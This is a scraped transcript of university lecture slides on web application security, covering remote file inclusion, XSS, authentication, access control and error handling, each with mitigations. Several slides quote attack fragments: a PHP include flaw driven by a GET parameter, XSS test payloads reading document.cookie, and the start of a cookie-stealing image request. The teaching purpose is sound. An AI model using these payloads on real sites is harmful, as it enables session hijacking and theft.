CIT 380: Securing Computer SystemsSlide #1 CIT 380: Securing Computer Systems Web Security.

Slides:



Advertisements
Similar presentations
Nick Feamster CS 6262 Spring 2009
Advertisements

Cross Site Scripting (XSS)
What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.
©2009 Justin C. Klein Keane PHP Code Auditing Session 5 XSS & XSRF Justin C. Klein Keane
Attacking Authentication and Authorization CSE 591 – Security and Vulnerability Analysis Spring 2015 Adam Doupé Arizona State University
CMSC 414 Computer and Network Security Lecture 24 Jonathan Katz.
By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.
It’s always better live. MSDN Events Security Best Practices Part 2 of 2 Reducing Vulnerabilities using Visual Studio 2008.
Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.
Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.
It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.
Information Networking Security and Assurance Lab National Chung Cheng University 1 Top Vulnerabilities in Web Applications (I) Unvalidated Input:  Information.
Lecture 16 Page 1 CS 236 Online Cross-Site Scripting XSS Many sites allow users to upload information –Blogs, photo sharing, Facebook, etc. –Which gets.
Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software
WEB SECURITY WORKSHOP TEXSAW 2013 Presented by Joshua Hammond Prepared by Scott Hand.
Designing Security In Web Applications Andrew Tomkowiak 10/8/2013 UW-Platteville Software Engineering Department
Web Application Vulnerabilities Checklist. EC-Council Parameter Checklist  URL request  URL encoding  Query string  Header  Cookie  Form field 
Web-based Document Management System By Group 3 Xinyi Dong Matthew Downs Joshua Ferguson Sriram Gopinath Sayan Kole.
PHP Security.
OWASP Zed Attack Proxy Project Lead
Cosc 4765 Server side Web security. Web security issues From Cenzic Vulnerability report
Cross-Site Scripting Vulnerabilities Adam Doupé 11/24/2014.
Prevent Cross-Site Scripting (XSS) attack
Lets Make our Web Applications Secure. Dipankar Sinha Project Manager Infrastructure and Hosting.
+ Websites Vulnerabilities. + Content Expand of The Internet Use of the Internet Examples Importance of the Internet How to find Security Vulnerabilities.
WEB SECURITY WEEK 3 Computer Security Group University of Texas at Dallas.
CSCI 6962: Server-side Design and Programming Secure Web Programming.
Lecture 14 – Web Security SFDV3011 – Advanced Web Development 1.
Chapter 9 Web Applications. Web Applications are public and available to the entire world. Easy access to the application means also easy access for malicious.
© All rights reserved. Zend Technologies, Inc. PHP Security Kevin Schroeder Zend Technologies.
November 13, 2008 Ohio Information Security Forum Attack Surface of Web Applications James Walden Northern Kentucky University
Web 2.0 Security James Walden Northern Kentucky University.
Copyright 2007 © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.
Lecture 16 Page 1 CS 236 Online SQL Injection Attacks Many web servers have backing databases –Much of their information stored in a database Web pages.
3-Protecting Systems Dr. John P. Abraham Professor UTPA.
Cross-Site Attacks James Walden Northern Kentucky University.
Security Scanners Mark Shtern. Popular attack targets Web – Web platform – Web application Windows OS Mac OS Linux OS Smartphone.
Top Five Web Application Vulnerabilities Vebjørn Moen Selmersenteret/NoWires.org Norsk Kryptoseminar Trondheim
School of Computing and Information Systems CS 371 Web Application Programming Security Avoiding and Preventing Attacks.
Foundations of Network and Computer Security J J ohn Black CSCI 6268/TLEN 5550, Spring 2013.
PHP Workshop ‹#› PHP Security. PHP Workshop ‹#› Two Golden Rules 1.FILTER external input Obvious.. $_POST, $_COOKIE, etc. Less obvious.. $_SERVER 2.ESCAPE.
PHP2010/11 : [‹#›] PHP Security. PHP2010/11 : [‹#›] Two Golden Rules 1.FILTER external input Obvious.. $_POST, $_COOKIE, etc. Less obvious.. $_SERVER.
Prof Frankl, Spring 2008CS Polytechnic University 1 Overview of Web database applications with PHP.
The attacks ● XSS – type 1: non-persistent – type 2: persistent – Advanced: other keywords (, prompt()) or other technologies such as Flash.
October 3, 2008IMI Security Symposium Application Security through a Hacker’s Eyes James Walden Northern Kentucky University
SecurityPHPApril 2010 : [‹#›] PHP Security. SecurityPHPApril 2010 : [‹#›] Two Golden Rules 1.FILTER external input Obvious.. $_POST, $_COOKIE, etc. Less.
Web Applications Testing By Jamie Rougvie Supported by.
Building Secure Web Applications With ASP.Net MVC.
Crash Course in Web Hacking
June 14, 2007 Web Application Security Workshop James Walden.
COMP9321 Web Application Engineering Semester 2, 2015 Dr. Amin Beheshti Service Oriented Computing Group, CSE, UNSW Australia Week 9 1COMP9321, 15s2, Week.
Web Security Lesson Summary ●Overview of Web and security vulnerabilities ●Cross Site Scripting ●Cross Site Request Forgery ●SQL Injection.
PHP Error Handling & Reporting. Error Handling Never allow a default error message or error number returned by the mysql_error() and mysql_errno() functions.
Writing secure Flex applications  MXML tags with security restrictions  Disabling viewSourceURL  Remove sensitive information from SWF files  Input.
Session 11: Cookies, Sessions ans Security iNET Academy Open Source Web Development.
Do not try any of the techniques discussed in this presentation on a system you do not own. It is illegal and you will get caught.
By Collin Donaldson. Hacking is only legal under the following circumstances: 1.You hack (penetration test) a device/network you own. 2.You gain explicit,
SlideSet #20: Input Validation and Cross-site Scripting Attacks (XSS) SY306 Web and Databases for Cyber Operations.
Group 18: Chris Hood Brett Poche
Building Secure ColdFusion Applications
Web Application Vulnerabilities
Web Application Vulnerabilities, Detection Mechanisms, and Defenses
TOPIC: Web Security (Part-4)
World Wide Web policy.
CS 371 Web Application Programming
CSC 482/582: Computer Security
CSC 495/583 Topics of Software Security Intro to Web Security
Presentation transcript:

CIT 380: Securing Computer SystemsSlide #1 CIT 380: Securing Computer Systems Web Security

CIT 380: Securing Computer SystemsSlide #2 Insecure Remote File Inclusion Insecure remote file inclusion vulnerabilities allow an attack to trick the application into executing code provided by the attacker on another site. Dynamic code –Includes in PHP, Java,.NET –DTDs for XML documents Key Idea –Attacker controls pathname for inclusion.

CIT 380: Securing Computer SystemsSlide #3 PHP Remote Inclusion Flaw A PHP product uses "require" or "include" statements, or equivalent statements, that use attacker-controlled data to identify code or HTML to be directly processed by the PHP interpreter before inclusion in the script. <?php // index.php include('config.php'); include('include.php'); // Script body ?> <?php //config.php $server_root = '/my/path'; ?> <?php //include.php include($server_root. '/someotherfile.php'); ?> GET /include.php?server_root=

CIT 380: Securing Computer SystemsSlide #4 Mitigating Remote File Inclusion 1.Turn off remote file inclusion. 2.Do not run code from uploaded files. 3.Do not use user-supplied paths. 4.Validate all paths before loading code.

CIT 380: Securing Computer SystemsSlide #5 Unvalidated Input Unvalidated input is an architecture flaw. –Individual input-related bugs are easy to fix. –How do you defend against the general problem of input-based attacks? Key Ideas –Application needs to validate all input. –Input validation needs to be part of design.

CIT 380: Securing Computer SystemsSlide #6 Input Validation Solutions All input must be validated. Input must be validated on the server. Use a standard set of validation rules. Reject all input that isn’t in your whitelist. –Blacklists can miss bad inputs. –Input repairs can produce bad input.

CIT 380: Securing Computer SystemsSlide #7 Authentication Authentication is the process of determining a user’s identity. Key Ideas –HTTP is a stateless protocol. –Every request must be authenticated. –Use username/password on first request. –Use session IDs on subsequent queries.

CIT 380: Securing Computer SystemsSlide #8 Authentication Attacks Sniffing passwords Guessing passwords Identity management attacks Replay attacks Session ID fixation Session ID guessing

CIT 380: Securing Computer SystemsSlide #9 Identity Management Attacks Auth requires identity management –User registration –Password changes and resets Mitigations –Use CAPTCHAs to protect registration. –Don’t use easy to guess secret questions. –Don’t allow attacker to reset address that new password is sent to.

CIT 380: Securing Computer SystemsSlide #10 Session ID Guessing Do session IDs show a pattern? –How does changing username change ID? –How do session IDs change with time? Brute forcing session IDs –Use program to try 1000s of session IDs. Mitigating guessing attacks –Use a large key space (128+ bits). –Use a cryptographically random algorithm.

CIT 380: Securing Computer SystemsSlide #11 Mitigating Authentication Attacks Use SSL to prevent sniffing attacks. Require strong passwords. Use secure identity management. Use a secure session ID mechanism. –IDs chosen at random from large space. –Regenerate session IDs with each request. –Expire session IDs in short time.

CIT 380: Securing Computer SystemsSlide #12 Access Control Access control determines which users have access to which system resources. Levels of access control –Site –URL –Function –Function(parameters) –Data

CIT 380: Securing Computer SystemsSlide #13 Mitigating Broken Access Control 1.Check every access. 2.Use whitelist model at every layer. 3.Do not rely on client-level access control. 4.Do not rely on security through obscurity.

CIT 380: Securing Computer SystemsSlide #14 Cross-Site Scripting (XSS) Attacker causes a legitimate web server to send user executable content (Javascript, Flash ActiveScript) of attacker’s choosing. XSS used to obtain session ID for –Bank site (transfer money to attacker) –Shopping site (buy goods for attacker) – Key ideas –Attacker sends malicious code to server. –Victim’s browser loads code from server and runs it.

CIT 380: Securing Computer SystemsSlide #15 XSS Attacks MySpace worm (October 2005) –When someone viewed Samy’s profile: Set him as friend of viewer. Incorporated code in viewer’s profile. Paypal (2006) –XSS redirect used to steal money from Paypal users in a phishing scam. BBC, CBS (2006) –By following XSS link from securitylab.ru, you could read an apparently valid story on the BBC or CBS site claiming that Bush appointed a 9-year old as head of the Information Security department.

CIT 380: Securing Computer SystemsSlide #16 Stored XSS –Injected script stored in comment, message, etc. –Requires ability to insert malicious code into web documents (comments, reviews, etc.) –Persistent until message deleted.

CIT 380: Securing Computer SystemsSlide #17 Reflected XSS –Injected script returned by one-time message. –Requires tricking user to click on link. –Non-persistent. Only works when user clicks.

CIT 380: Securing Computer SystemsSlide #18 Why does XSS Work? Same-Origin Policy –Browser only allows Javascript from site X to access cookies and other data from site X. –Attacker needs to make attack come from site X. Vulnerable Server Program –Any program that returns user input without filtering out dangerous code.

CIT 380: Securing Computer SystemsSlide #19 Anatomy of an XSS Attack 1. Login 2. Cookie Web Server 3. XSS Attack Attacker User 4. User clicks on XSS link. 5. XSS URL 7. Browser runs injected code. Evil site saves ID. 8. Attacker hijacks user session. 6. Page with injected code.

CIT 380: Securing Computer SystemsSlide #20 XSS URL Examples = get="> alert(document.cookie) page2.html?tw= alert(‘Test’); aler t(document.cookie) &frompage=4&page=1&ct =VVTV&mh=0&sh=0&RN=1 rch_exe?search_text=_%22%3E%3Cscript%3Ealert%28d ocument.cookie%29%3C%2Fscript%3E

March 15, 2008SIGCSE Exploiting the Vulnerability 1.User logins in and is issued a cookie 2.Attacker feed the URL to user var+i=new+Image;+i.src=“

March 15, 2008SIGCSE Exploiting the Vulnerability 1.User logins in and is issued a cookie 2.Attacker feed the URL to user var+i=new+Image;+i.src=“

CIT 380: Securing Computer SystemsSlide #23 Mitigating XSS 1.Disallow HTML input 2.Allow only safe HTML tags 3.Filter output Replace HTML special characters in output ex: replace with > also replace (, ), #, & 4.Tagged cookies Include IP address in cookie and only allow access to original IP address that cookie was created for. 5.Client: disable Javascript Use NoScript extension for Firefox.

CIT 380: Securing Computer SystemsSlide #24 Improper Error Handling Applications can unintentionally leak information about configuration, architecture, or sensitive data when handling errors improperly. Errors can provide too much data –Stack traces –SQL statements –Subsystem errors –User typos, such as passwords.

CIT 380: Securing Computer SystemsSlide #25 Example of Improper Error Handling mySQL error with query SELECT COUNT(*) FROM nucleus_comment as c WHERE c.citem=90: Can't open file: 'nucleus_comment.MYI' (errno: 145) Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/exalt2/public_html/username/nucle us/libs/COMMENTS.php on line 124

CIT 380: Securing Computer SystemsSlide #26 Mitigating Improper Error Handling 1.Catch all exceptions. 2.Check all error codes. 3.Wrap application with catch-all handler. 4.Send user-friendly message to user. 5.Store details for debugging in log files. 6.Don’t log passwords or other sensitive data.

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2025 SlidePlayer.com. Inc. All rights reserved.